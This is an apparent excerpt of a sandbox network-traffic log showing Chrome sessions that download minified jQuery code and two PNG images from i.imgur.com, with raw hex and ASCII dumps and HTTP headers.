2025-03-17 21:35:02 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-03-17 21:35:02 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-03-17 21:35:02 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-03-17 21:35:02 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-03-17 21:35:02 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.24	60837	199.232.196.193	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:03 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:03 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 17 Mar 2025 21:35:03 GMT Age: 1950360 X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740032-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 2 X-Timer: S1742247304.745075,VS0,VE0 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-17 21:35:03 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.24	60836	199.232.196.193	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:03 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:03 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 17 Mar 2025 21:35:03 GMT Age: 1999376 X-Served-By: cache-iad-kjyo7100129-IAD, cache-nyc-kteb1890052-NYC X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 13, 3 X-Timer: S1742247304.747889,VS0,VE0 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B 